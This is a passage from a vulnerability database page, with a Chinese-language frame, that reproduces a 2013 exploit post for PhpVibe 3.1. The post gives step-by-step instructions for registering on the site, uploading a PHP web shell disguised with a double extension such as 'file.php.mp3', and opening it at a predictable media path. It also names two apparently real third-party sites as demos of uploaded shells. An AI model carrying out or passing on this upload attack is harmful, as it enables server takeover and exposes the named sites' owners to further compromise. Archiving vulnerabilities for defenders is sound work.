PhpVibe 3.1 Shell Upload

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044536 漏洞类型
发布时间 2013-08-23 更新时间 2013-08-23
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013080186
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
___________.__             _________                              _________                        
\__    ___/|  |__   ____   \_   ___ \_______  ______  _  ________ \_   ___ \_______   ______  _  __
  |    |   |  |  \_/ __ \  /    \  \/\_  __ \/  _ \ \/ \/ /  ___/ /    \  \/\_  __ \_/ __ \ \/ \/ /
  |    |   |   Y  \  ___/  \     \____|  | \(  <_> )     /\___ \  \     \____|  | \/\  ___/\     / 
  |____|   |___|  /\___  >  \______  /|__|   \____/ \/\_//____  >  \______  /|__|    \___  >\/\_/  
                \/     \/          \/                         \/          \/             \/        

				
http://thecrowscrew.org
#################################################################################################
Exploit Title: PhpVibe 3.1 Upload Shell Vulnerability
Google Dork: use ur brain :P
Date: 22/08/2013
Locations: Indonesia
Author: Gabby
Product: PhpVibe
Official site: http://phprevolution.com/
Risk Level: High 
#################################################################################################

Poc : 
u must regist first,. n go to video upload,. 

http://site.com/upload

upload ur shell as extensi "file.php.mp3" / "file.php.mp4"  / "file.php.flv

shell akses :
http://site.com/media/flv/month-date-year-time-minute-pm/am-file.php.mp3

Demo : 
http://viralwire.co.uk/media/flv/august-21-13-10-57-pm-file.php.mp3
http://otelvideo.ru//media/flv/august-22-13-1-42-am-file.php.flv


################################################################################?#################

Thanks to :
Catalyst71, kit4r0, 777r, ovanIsmycode, walangkaji, penjamoen, "Dad", my sista Wii, Red-x,  all my luvly friend,..
Yogyacarderlink, SurabayaBlackhat, n for Someone, i cant say his name,. thanks for give me idea..^^